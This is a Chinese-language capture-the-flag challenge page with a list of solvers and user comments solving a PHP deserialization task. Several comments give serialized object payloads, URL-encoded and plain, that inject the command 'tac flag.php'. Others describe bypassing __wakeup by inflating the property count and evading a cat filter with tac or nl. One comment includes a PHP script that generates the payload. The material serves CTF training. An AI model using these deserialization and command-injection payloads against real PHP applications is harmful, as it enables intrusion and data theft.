评分(3)
解题动态

看writeup刷题 攻破了该题 19小时前

288728 攻破了该题 20小时前

songci1 攻破了该题 1天前

789123 攻破了该题 6天前

tingsi464 攻破了该题 7天前

雾島风起時 攻破了该题 7天前

forces 攻破了该题 8天前

liujiahaoctf 攻破了该题 10天前

卯壬在此 攻破了该题 10天前

33538626867 攻破了该题 11天前

nina123 攻破了该题 11天前

qgys 攻破了该题 13天前

19189756057 攻破了该题 14天前

Wsss12 攻破了该题 15天前

shangss 攻破了该题 15天前

ymkiras 攻破了该题 15天前

c2F1eQ 攻破了该题 17天前

11111in 攻破了该题 19天前

jiangnanwithrain 攻破了该题 20天前

评论
iamblue 1月前
举报
O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22%00%2A%00cmd%22%3Bs%3A12%3A%22tac+flag.php%22%3B%7D
tfios 2月前
举报
环境变量里边也有 FLAG
LLTVLL 6月前
举报
AI分析PHP序列化程序得出结果,注意补空格和占位符,降低学习PHP语言的成本,提升准确率。。。。
Bojing 11月前
举报
有哪里提示了username是admin的吗
numberone 10月前
举报
源代码里不是有个if语句:if ($this->username === 'admin')
18956160518 1年前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
EtHat 1年前
举报
O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
xht0525 1年前
举报
nl flag.php|base64
不会编程的崽 1年前
举报
<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>
不会编程的崽 1年前
举报
O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
c41vin 1年前
举报
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6